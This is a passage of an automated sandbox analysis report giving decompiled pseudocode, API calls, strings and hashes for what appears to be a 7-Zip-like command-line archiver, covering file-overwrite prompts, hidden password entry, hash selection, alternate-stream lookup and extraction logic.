                                                                                                                    0x00b4616b
                                                                                                                    0x00b46170
                                                                                                                    0x00b46172
                                                                                                                    0x00b4617d
                                                                                                                    0x00b4618f
                                                                                                                    0x00b4618f
                                                                                                                    0x00b4619a
                                                                                                                    0x00b461a7
                                                                                                                    0x00b461ad
                                                                                                                    0x00b460c0
                                                                                                                    0x00b461b4
                                                                                                                    0x00b461bc

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B4608E
                                                                                                                      • Part of subcall function 00B4B618: fputs.MSVCRT ref: 00B4B681
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prologfputs
                                                                                                                    • String ID: Alternate streams$Alternate streams size$Files$Folders$Size
                                                                                                                    • API String ID: 1798449854-232602582
                                                                                                                    • Opcode ID: 0766f3da849bc6b6aa316faaf7ebf7b22d392535060929199e9a7bf28da5a754
                                                                                                                    • Instruction ID: d8dedc68ce3e2179cb9d3262bf960ab82022cd785a7c6186f205b45549416a7f
                                                                                                                    • Opcode Fuzzy Hash: 0766f3da849bc6b6aa316faaf7ebf7b22d392535060929199e9a7bf28da5a754
                                                                                                                    • Instruction Fuzzy Hash: 4731A875700700AFDB34AB61C982FAAB7E6FF84300F00465DF556526A1CB70AD55DB62
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B44700 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00B44700(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, signed int* _a32) {
				void* __ebp;
				void* _t23;
				signed int _t25;
				struct _IO_FILE** _t46;
				intOrPtr _t49;
				void* _t50;

				EnterCriticalSection(0xb9a878);
				_t23 = L00B4574E();
				if(_t23 == 0) {
					_t49 = _a4;
					E00B44839(_t49);
					_t46 =  *(_t49 + 0xc8);
					if(_t46 != 0) {
						E00B11FE9(_t46);
						fputs("Would you like to replace the existing file:\n",  *_t46);
						E00B44860( *(_t49 + 0xc8), _a8, _a12, _a16);
						fputs("with the file from archive:\n",  *( *(_t49 + 0xc8)));
						E00B44860( *(_t49 + 0xc8), _a20, _a24, _a28);
					}
					_t25 = E00B4CB6D( *(_t49 + 0xc8));
					if(_t25 > 7) {
						L16:
						_t50 = 0x80004005;
						goto L17;
					} else {
						switch( *((intOrPtr*)(_t25 * 4 +  &M00B44819))) {
							case 0:
								 *_a32 =  *_a32 & 0x00000000;
								goto L12;
							case 1:
								 *_a32 = 2;
								goto L12;
							case 2:
								 *_a32 = 1;
								goto L12;
							case 3:
								 *_a32 = 3;
								goto L12;
							case 4:
								 *_a32 = 4;
								L12:
								__ecx =  *((intOrPtr*)(__esi + 0xc8));
								if(__ecx != 0) {
									E00B11FE9(__ecx);
									if( *((char*)(__esi + 0x160)) != 0) {
										__ecx =  *((intOrPtr*)(__esi + 0xc8));
										L00B11FDA( *((intOrPtr*)(__esi + 0xc8)));
									}
								}
								L00B4574E();
								goto L1;
							case 5:
								_t50 = 0x80004004;
								L17:
								LeaveCriticalSection(0xb9a878);
								return _t50;
							case 6:
								goto L16;
						}
					}
				}
				L1:
				_t50 = _t23;
				goto L17;
			}









                                                                                                                    0x00b4470b
                                                                                                                    0x00b44711
                                                                                                                    0x00b44718
                                                                                                                    0x00b44721
                                                                                                                    0x00b44727
                                                                                                                    0x00b4472c
                                                                                                                    0x00b44734
                                                                                                                    0x00b44738
                                                                                                                    0x00b4474a
                                                                                                                    0x00b4475d
                                                                                                                    0x00b4476f
                                                                                                                    0x00b44782
                                                                                                                    0x00b44782
                                                                                                                    0x00b4478d
                                                                                                                    0x00b44796
                                                                                                                    0x00b44805
                                                                                                                    0x00b44805
                                                                                                                    0x00000000
                                                                                                                    0x00b44798
                                                                                                                    0x00b44798
                                                                                                                    0x00000000
                                                                                                                    0x00b447ca
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b447a9
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b447bf
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b447b4
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b447d2
                                                                                                                    0x00b447d8
                                                                                                                    0x00b447d8
                                                                                                                    0x00b447e0
                                                                                                                    0x00b447e2
                                                                                                                    0x00b447ee
                                                                                                                    0x00b447f0
                                                                                                                    0x00b447f6
                                                                                                                    0x00b447f6
                                                                                                                    0x00b447ee
                                                                                                                    0x00b447fb
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b4479f
                                                                                                                    0x00b4480a
                                                                                                                    0x00b4480b
                                                                                                                    0x00b44816
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b44798
                                                                                                                    0x00b44796
                                                                                                                    0x00b4471a
                                                                                                                    0x00b4471a
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(00B9A878), ref: 00B4470B
                                                                                                                    • fputs.MSVCRT ref: 00B4474A
                                                                                                                    • fputs.MSVCRT ref: 00B4476F
                                                                                                                    • LeaveCriticalSection.KERNEL32(00B9A878), ref: 00B4480B
                                                                                                                    Strings
                                                                                                                    • Would you like to replace the existing file:, xrefs: 00B44745
                                                                                                                    • with the file from archive:, xrefs: 00B4476A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSectionfputs$EnterLeave
                                                                                                                    • String ID: Would you like to replace the existing file:$with the file from archive:
                                                                                                                    • API String ID: 3346953513-686978020
                                                                                                                    • Opcode ID: d5d89482de939876bf6d8b8ed4bf7836ba18179f3cc8c6e86d8a5d6aa16f5888
                                                                                                                    • Instruction ID: c2d4f037b4fef7a734f390df6ff97b1b4cdc4b9765f2fb9aa06b43c0d6a4f4c4
                                                                                                                    • Opcode Fuzzy Hash: d5d89482de939876bf6d8b8ed4bf7836ba18179f3cc8c6e86d8a5d6aa16f5888
                                                                                                                    • Instruction Fuzzy Hash: 0831CE79200604DBDB11EF64DC81BEA77E5EF4A310F124199F91A97260CB30AD62EB65
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B4CCBC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 89%
                                                                                                                    			E00B4CCBC(void* __ebx, struct _IO_FILE** __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v5;
				long _v12;
				struct _IO_FILE** _v16;
				intOrPtr _v20;
				void* __ebp;
				void* _t16;
				void* _t29;
				signed int _t30;
				void* _t41;
				struct _IO_FILE** _t44;
				signed int _t52;

				_t29 = __ebx;
				_t44 = __ecx;
				_v20 = __edx;
				_v16 = __ecx;
				if(__ecx != 0) {
					fputs("\nEnter password (will not be echoed):",  *__ecx);
					L00B11FDA(_t44);
				}
				_push(_t29);
				_t16 = GetStdHandle(0xfffffff6);
				_v12 = _v12 & 0x00000000;
				_t41 = _t16;
				_t30 = 0;
				if(_t41 != 0xffffffff && _t41 != 0 && GetConsoleMode(_t41,  &_v12) != 0) {
					_t8 = SetConsoleMode(_t41, _v12 & 0x000000fb) != 0;
					_t52 = _t8;
					_t30 = 0 | _t8;
				}
				_push(_v20);
				_v5 = L00B11F11(0xb9a598, _t52);
				if(_t30 != 0) {
					SetConsoleMode(_t41, _v12);
				}
				if(_v16 != 0) {
					E00B11FE9(_v16);
					L00B11FDA(_v16);
				}
				return _v5;
			}














                                                                                                                    0x00b4ccbc
                                                                                                                    0x00b4ccc3
                                                                                                                    0x00b4ccc8
                                                                                                                    0x00b4cccb
                                                                                                                    0x00b4ccce
                                                                                                                    0x00b4ccd7
                                                                                                                    0x00b4cce1
                                                                                                                    0x00b4cce1
                                                                                                                    0x00b4cce6
                                                                                                                    0x00b4cce9
                                                                                                                    0x00b4ccef
                                                                                                                    0x00b4ccf9
                                                                                                                    0x00b4ccfb
                                                                                                                    0x00b4cd00
                                                                                                                    0x00b4cd20
                                                                                                                    0x00b4cd20
                                                                                                                    0x00b4cd20
                                                                                                                    0x00b4cd20
                                                                                                                    0x00b4cd23
                                                                                                                    0x00b4cd32
                                                                                                                    0x00b4cd36
                                                                                                                    0x00b4cd3c
                                                                                                                    0x00b4cd3c
                                                                                                                    0x00b4cd44
                                                                                                                    0x00b4cd49
                                                                                                                    0x00b4cd51
                                                                                                                    0x00b4cd51
                                                                                                                    0x00b4cd5a

                                                                                                                    APIs
                                                                                                                    • fputs.MSVCRT ref: 00B4CCD7
                                                                                                                      • Part of subcall function 00B11FDA: fflush.MSVCRT ref: 00B11FDC
                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00B4CCE9
                                                                                                                    • GetConsoleMode.KERNEL32(00000000,00000000), ref: 00B4CD0B
                                                                                                                    • SetConsoleMode.KERNEL32(00000000,00000000), ref: 00B4CD1C
                                                                                                                    • SetConsoleMode.KERNEL32(00000000,00000000), ref: 00B4CD3C
                                                                                                                    Strings
                                                                                                                    • Enter password (will not be echoed):, xrefs: 00B4CCD2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ConsoleMode$Handlefflushfputs
                                                                                                                    • String ID: Enter password (will not be echoed):
                                                                                                                    • API String ID: 108775803-3720017889
                                                                                                                    • Opcode ID: be435d11055325eb67fdd5e1f6ed7f0e5920d1a4a10e60c646a11532bc4233a8
                                                                                                                    • Instruction ID: 3b224da2550834f7440cc6e23a9cf876d6a2113457d54ec2ce0aef0e455a7ca6
                                                                                                                    • Opcode Fuzzy Hash: be435d11055325eb67fdd5e1f6ed7f0e5920d1a4a10e60c646a11532bc4233a8
                                                                                                                    • Instruction Fuzzy Hash: C711E731D05119BBCF01ABA89C416FDBFF8EF41B20F1441E5E811A31A0CB304946DB55
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B34B97 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 60COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 92%
                                                                                                                    			E00B34B97(void* __ebx, void* __ecx, void* __edx) {
				void* _t13;
				void* _t15;
				void* _t16;
				void* _t19;
				void* _t34;
				char* _t38;
				void* _t40;

				_t19 = __ebx;
				_t13 = L00B7F140(E00B84CC0, _t40);
				_t34 = __ecx;
				if(__edx != 0x20) {
					if(__edx != 0x14) {
						if(__edx != 0x10) {
							if(__edx != 8) {
								if(__edx != 4) {
									L12:
									 *[fs:0x0] =  *((intOrPtr*)(_t40 - 0xc));
									return _t13;
								}
								_t38 = "crc32";
								L10:
								_push(_t19);
								E00B126FB(_t40 - 0x20, _t38);
								 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
								_t15 = E00B1A63E(_t40 - 0x14);
								 *(_t40 - 4) =  *(_t40 - 4) | 0xffffffff;
								_t13 = E00B11E89(_t15,  *((intOrPtr*)(_t40 - 0x20)));
								if(_t15 != 0) {
									_t16 = L00B12E16(_t40 - 0x2c, _t38);
									 *(_t40 - 4) = 1;
									E00B56B33(_t34);
									_push(_t16);
									_t13 = E00B11E89(E00B11524(_t34),  *((intOrPtr*)(_t40 - 0x2c)));
								}
								goto L12;
							}
							_t38 = 0xb8af34;
							goto L10;
						}
						_t38 = 0xb8af44;
						goto L10;
					}
					_t38 = 0xb8af48;
					goto L10;
				}
				_t38 = "sha256";
				goto L10;
			}










                                                                                                                    0x00b34b97
                                                                                                                    0x00b34b9c
                                                                                                                    0x00b34ba9
                                                                                                                    0x00b34bab
                                                                                                                    0x00b34bb7
                                                                                                                    0x00b34bc3
                                                                                                                    0x00b34bcf
                                                                                                                    0x00b34bdb
                                                                                                                    0x00b34c38
                                                                                                                    0x00b34c3d
                                                                                                                    0x00b34c45
                                                                                                                    0x00b34c45
                                                                                                                    0x00b34bdd
                                                                                                                    0x00b34be2
                                                                                                                    0x00b34be2
                                                                                                                    0x00b34be7
                                                                                                                    0x00b34bec
                                                                                                                    0x00b34bf5
                                                                                                                    0x00b34bfa
                                                                                                                    0x00b34c03
                                                                                                                    0x00b34c0c
                                                                                                                    0x00b34c12
                                                                                                                    0x00b34c1b
                                                                                                                    0x00b34c22
                                                                                                                    0x00b34c29
                                                                                                                    0x00b34c32
                                                                                                                    0x00b34c37
                                                                                                                    0x00000000
                                                                                                                    0x00b34c0c
                                                                                                                    0x00b34bd1
                                                                                                                    0x00000000
                                                                                                                    0x00b34bd1
                                                                                                                    0x00b34bc5
                                                                                                                    0x00000000
                                                                                                                    0x00b34bc5
                                                                                                                    0x00b34bb9
                                                                                                                    0x00000000
                                                                                                                    0x00b34bb9
                                                                                                                    0x00b34bad
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID: crc32$crc64$md5$sha1$sha256
                                                                                                                    • API String ID: 3519838083-3826973078
                                                                                                                    • Opcode ID: 12bb5ce6a1d716d4ea9a3542b4247badd8a0eac9d9d42c4059035a8554ddc8b3
                                                                                                                    • Instruction ID: b02dd2e64f577a618e506b092be4cfa4a22bd8f5ed1b967145b2f3383b8746db
                                                                                                                    • Opcode Fuzzy Hash: 12bb5ce6a1d716d4ea9a3542b4247badd8a0eac9d9d42c4059035a8554ddc8b3
                                                                                                                    • Instruction Fuzzy Hash: F2110273E0201486DF14B698AA817EDB3F9DBD5321F7482F6E502B3190EB345E84C3A2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B166E8 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 24libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00B166E8() {
				struct HINSTANCE__* _t10;

				_t10 = GetModuleHandleA("kernel32.dll");
				 *0xb9a5cc = GetProcAddress(_t10, "FindFirstStreamW");
				 *0xb9a5c8 = GetProcAddress(_t10, "FindNextStreamW");
				return 0xb9a5c4;
			}




                                                                                                                    0x00b1670d
                                                                                                                    0x00b1671d
                                                                                                                    0x00b16724
                                                                                                                    0x00b1672e

                                                                                                                    APIs
                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00B16701
                                                                                                                    • GetProcAddress.KERNEL32(00000000,FindFirstStreamW), ref: 00B16715
                                                                                                                    • GetProcAddress.KERNEL32(00000000,FindNextStreamW), ref: 00B16722
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                    • String ID: FindFirstStreamW$FindNextStreamW$kernel32.dll
                                                                                                                    • API String ID: 667068680-4044117955
                                                                                                                    • Opcode ID: f1760147cea8efb64de38b68f61d65e05afd8d424ec5da651f223e36a1faec16
                                                                                                                    • Instruction ID: 9e152a76aebd00715a2f134351003279f69554118b6c041d3b808666e0cf27d9
                                                                                                                    • Opcode Fuzzy Hash: f1760147cea8efb64de38b68f61d65e05afd8d424ec5da651f223e36a1faec16
                                                                                                                    • Instruction Fuzzy Hash: 45E0EC72B442157B5B107B696C8D8B6BAF8EAB5A6131900FBF501E3370D9A44C42DBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B2E153 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 461COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 91%
                                                                                                                    			E00B2E153(signed int __ecx, signed int __edx, void* __fp0) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t226;
				signed int _t229;
				signed int* _t235;
				signed int _t236;
				signed int _t244;
				intOrPtr _t245;
				intOrPtr _t246;
				void* _t249;
				void* _t251;
				signed int _t254;
				signed int _t264;
				intOrPtr* _t273;
				void* _t276;
				void* _t286;
				void* _t288;
				intOrPtr* _t297;
				void* _t299;
				void* _t303;
				void* _t306;
				signed int* _t308;
				void* _t319;
				intOrPtr* _t322;
				intOrPtr* _t324;
				void* _t328;
				signed int _t333;
				signed int _t364;
				signed int _t365;
				signed int _t368;
				signed int _t370;
				signed int _t371;
				signed int _t372;
				signed int _t376;
				intOrPtr* _t377;
				signed int _t378;
				signed int _t380;
				signed int* _t383;
				signed int _t384;
				signed int _t385;
				void* _t386;
				void* _t388;
				void* _t389;
				void* _t391;
				void* _t392;
				void* _t401;
				void* _t403;

				_t403 = __fp0;
				L00B7F140(E00B84472, _t389);
				_t392 = _t391 - 0xf0;
				_t306 = 0;
				_t380 = __edx;
				 *((intOrPtr*)(_t389 - 0x24)) = __edx;
				 *(_t389 - 0x10) = __ecx;
				_t368 = 1;
				if(__ecx == 0) {
					 *(_t389 - 0x10) = _t368;
				}
				_t364 = _t389 - 0x50;
				if(E00B1A63E(_t364) == 0) {
					L59:
					_t226 = 0x80004001;
					goto L81;
				} else {
					 *(_t389 - 0x14) = _t368;
					if(_t380 != _t306) {
						 *(_t389 - 0x14) = _t380;
					}
					_t229 = L00B7F310(L00B7F310(L00B7F440( *((intOrPtr*)(_t389 + 8)),  *(_t389 + 0xc), 0x100, _t306), _t364,  *((intOrPtr*)(_t389 + 0x1c)), _t306), _t364,  *(_t389 - 0x14), _t306);
					 *(_t389 - 0x20) = _t229;
					 *(_t389 - 0x1c) = _t364;
					if((_t229 | _t364) == 0) {
						 *(_t389 - 0x20) = 1;
						 *(_t389 - 0x1c) = _t306;
					}
					_t370 =  *(_t389 - 0x10);
					 *(_t389 - 0xcc) = _t306;
					 *(_t389 - 0xc8) = _t306;
					 *(_t389 - 0x7c) = _t306;
					 *(_t389 - 0x78) = _t306;
					if(_t370 > 1 ||  *( *(_t389 + 0x30)) != _t306) {
						E00B2E775(_t389 - 0x3c);
						 *(_t389 - 4) = _t306;
						_push(4 + _t370 * 0x78);
						_t235 = E00B11E55();
						 *(_t389 + 0xc) = _t235;
						 *(_t389 - 4) = 1;
						if(_t235 == _t306) {
							_t383 = 0;
							__eflags = 0;
						} else {
							_push(L00B29E19);
							_t27 =  &(_t235[1]); // 0x4
							_t383 = _t27;
							 *_t235 = _t370;
							L00B7F25A(_t383, 0x78, _t370, E00B2E722);
						}
						 *(_t389 - 4) =  *(_t389 - 4) & 0x00000000;
						_t365 = 0;
						 *(_t389 - 0x3c) = _t383;
						_t236 = L00B77EF0(_t389 - 0x30, 0);
						_t401 = _t236 - _t306;
						if(_t401 == 0) {
							__eflags = _t370 - _t306;
							 *((char*)(_t389 - 0x2c)) = 1;
							 *(_t389 + 0xc) = _t306;
							if(_t370 <= _t306) {
								L27:
								__eflags =  *(_t389 - 0x10) - _t306;
								 *(_t389 + 0xc) = _t306;
								if( *(_t389 - 0x10) <= _t306) {
									L34:
									__eflags =  *(_t389 - 0x10) - _t306;
									 *(_t389 + 0xc) = _t306;
									if(__eflags <= 0) {
										L39:
										L00B279AA(_t389 - 0xfc, _t365, __eflags);
										_t236 = L00B29E64(_t389 - 0x3c, _t306);
										__eflags = _t236 - _t306;
										if(__eflags != 0) {
											goto L13;
										}
										_push(_t389 - 0xac);
										L00B27A55(_t389 - 0xfc, _t365, __eflags);
										_t319 = 0;
										__eflags =  *(_t389 - 0x10) - _t306;
										if( *(_t389 - 0x10) <= _t306) {
											L46:
											 *(_t389 - 4) =  *(_t389 - 4) | 0xffffffff;
											E00B2E788(_t389 - 0x3c);
											goto L74;
										}
										_t254 =  &(( *(_t389 - 0x3c))[0xffffffffffffffee]);
										__eflags = _t254;
										while(1) {
											_t384 =  *(_t254 + 0x74);
											__eflags = _t384 - _t306;
											if(_t384 != _t306) {
												goto L54;
											}
											__eflags = _t319 - _t306;
											if(_t319 == _t306) {
												L45:
												_t319 = _t319 + 1;
												_t254 = _t254 + 0x78;
												__eflags = _t319 -  *(_t389 - 0x10);
												if(_t319 <  *(_t389 - 0x10)) {
													continue;
												}
												goto L46;
											}
											_t365 =  *(_t254 + 0x78);
											__eflags = _t365 -  *_t254;
											if(_t365 !=  *_t254) {
												_t384 = 1;
												goto L54;
											}
											goto L45;
										}
										goto L54;
									}
									_t372 = 0;
									__eflags = 0;
									while(1) {
										_t386 = _t372 +  *(_t389 - 0x3c);
										_t236 = L00B77D90( *((intOrPtr*)(_t372 +  &(( *(_t389 - 0x3c))[0xd]))));
										__eflags = _t236 - _t306;
										if(_t236 != _t306) {
											goto L13;
										}
										_t384 =  *(_t386 + 0x2c);
										__eflags = _t384 - _t306;
										if(_t384 != _t306) {
											goto L54;
										}
										 *(_t389 + 0xc) =  *(_t389 + 0xc) + 1;
										_t372 = _t372 + 0x78;
										__eflags =  *(_t389 + 0xc) -  *(_t389 - 0x10);
										if(__eflags < 0) {
											continue;
										}
										goto L39;
									}
									goto L13;
								}
								 *(_t389 + 0x28) = _t306;
								while(1) {
									_t308 =  *(_t389 - 0x3c) +  *(_t389 + 0x28);
									_t333 = 7;
									_t308[0xe] =  *(_t389 + 0xc);
									_t92 =  &(_t308[0x10]); // 0x40
									_t308[0xf] = _t389 - 0x34;
									memcpy(_t92,  *(_t389 + 0x30), _t333 << 2);
									_t392 = _t392 + 0xc;
									_t236 = E00B2E6C2(_t308);
									__eflags =  *_t308;
									if( *_t308 != 0) {
										_t95 = _t389 - 0x38;
										 *_t95 = 1 +  *(_t389 - 0x38);
										__eflags =  *_t95;
									}
									__eflags = _t236;
									if(_t236 != 0) {
										goto L15;
									}
									 *(_t389 + 0xc) =  *(_t389 + 0xc) + 1;
									 *(_t389 + 0x28) =  *(_t389 + 0x28) + 0x78;
									__eflags =  *(_t389 + 0xc) -  *(_t389 - 0x10);
									if( *(_t389 + 0xc) <  *(_t389 - 0x10)) {
										continue;
									}
									_t306 = 0;
									__eflags = 0;
									goto L34;
								}
								goto L15;
							}
							 *(_t389 - 0x14) = _t306;
							 *(_t389 - 0x28) = _t306;
							while(1) {
								_t388 =  *(_t389 - 0x28) +  *(_t389 - 0x3c);
								E00B126D9(_t389 - 0x74);
								_t41 = _t388 + 0x28; // 0x28
								_t376 = _t41;
								_t365 = _t376;
								 *(_t389 - 4) = 2;
								_t264 = E00B1A92E(_t389 - 0x74, _t365,  *(_t389 - 0x50),  *((intOrPtr*)(_t389 - 0x4c)));
								__eflags = _t264 - _t306;
								if(_t264 != _t306) {
									break;
								}
								__eflags =  *_t376 - _t306;
								if( *_t376 == _t306) {
									_t384 = 0x80004001;
									L52:
									E00B11E89(_t264,  *((intOrPtr*)(_t389 - 0x74)));
									goto L54;
								}
								 *(_t389 - 0x18) = _t306;
								_t377 =  *_t376;
								 *(_t389 - 4) = 3;
								 *((intOrPtr*)( *_t377))(_t377, 0xb8d200, _t389 - 0x18);
								__eflags =  *(_t389 - 0x18) - _t306;
								if( *(_t389 - 0x18) == _t306) {
									L22:
									 *(_t388 + 0x20) =  *(_t388 + 0x20) & 0x00000000;
									 *((intOrPtr*)(_t388 + 4)) =  *((intOrPtr*)(_t389 + 0x2c));
									 *((intOrPtr*)(_t388 + 0xc)) =  *((intOrPtr*)(_t389 + 0x10));
									 *(_t388 + 0x18) =  *(_t389 - 0x20);
									 *(_t388 + 0x1c) =  *(_t389 - 0x1c);
									 *((intOrPtr*)(_t388 + 0x10)) =  *((intOrPtr*)(_t389 - 0x24));
									_t273 =  *((intOrPtr*)(_t389 + 0x24));
									__eflags = _t273 - _t306;
									if(_t273 != _t306) {
										 *(_t388 + 0x20) = 1;
										 *((intOrPtr*)(_t388 + 0x24)) =  *_t273;
									}
									 *(_t389 - 4) = 2;
									 *(_t388 + 0x74) =  *(_t389 - 0x14) & 0x000007ff;
									_t276 =  *(_t389 - 0x18);
									__eflags = _t276 - _t306;
									if(_t276 != _t306) {
										_t276 =  *((intOrPtr*)( *_t276 + 8))(_t276);
									}
									 *(_t389 - 4) =  *(_t389 - 4) & 0x00000000;
									E00B11E89(_t276,  *((intOrPtr*)(_t389 - 0x74)));
									 *(_t389 + 0xc) =  *(_t389 + 0xc) + 1;
									 *(_t389 - 0x28) =  *(_t389 - 0x28) + 0x78;
									 *(_t389 - 0x14) =  *(_t389 - 0x14) + 0x150;
									__eflags =  *(_t389 + 0xc) -  *(_t389 - 0x10);
									if( *(_t389 + 0xc) <  *(_t389 - 0x10)) {
										continue;
									} else {
										goto L27;
									}
								}
								_t378 = L00B1D2A8( *(_t389 - 0x18), _t306);
								__eflags = _t378 - _t306;
								if(_t378 != _t306) {
									_t264 =  *(_t389 - 0x18);
									 *(_t389 - 4) = 2;
									__eflags = _t264 - _t306;
									if(_t264 != _t306) {
										_t264 =  *((intOrPtr*)( *_t264 + 8))(_t264);
									}
									_t384 = _t378;
									goto L52;
								}
								goto L22;
							}
							_t384 = _t264;
							goto L52;
						} else {
							L13:
							if(_t401 > 0) {
								_t236 = _t236 & 0x0000ffff | 0x80070000;
							}
							L15:
							_t384 = _t236;
							L54:
							 *(_t389 - 4) =  *(_t389 - 4) | 0xffffffff;
							E00B2E788(_t389 - 0x3c);
							goto L69;
						}
					} else {
						 *(_t389 + 0x30) = _t306;
						 *(_t389 - 4) = 4;
						E00B126D9(_t389 - 0x48);
						 *(_t389 - 4) = 5;
						_t384 = E00B1A92E(_t389 - 0x48, _t389 + 0x30,  *(_t389 - 0x50),  *((intOrPtr*)(_t389 - 0x4c)));
						__eflags = _t384 - _t306;
						if(_t384 != _t306) {
							L67:
							E00B11E89(_t284,  *((intOrPtr*)(_t389 - 0x48)));
							_t286 =  *(_t389 + 0x30);
							 *(_t389 - 4) =  *(_t389 - 4) | 0xffffffff;
							__eflags = _t286 - _t306;
							if(_t286 != _t306) {
								 *((intOrPtr*)( *_t286 + 8))(_t286);
							}
							L69:
							_t226 = _t384;
							L81:
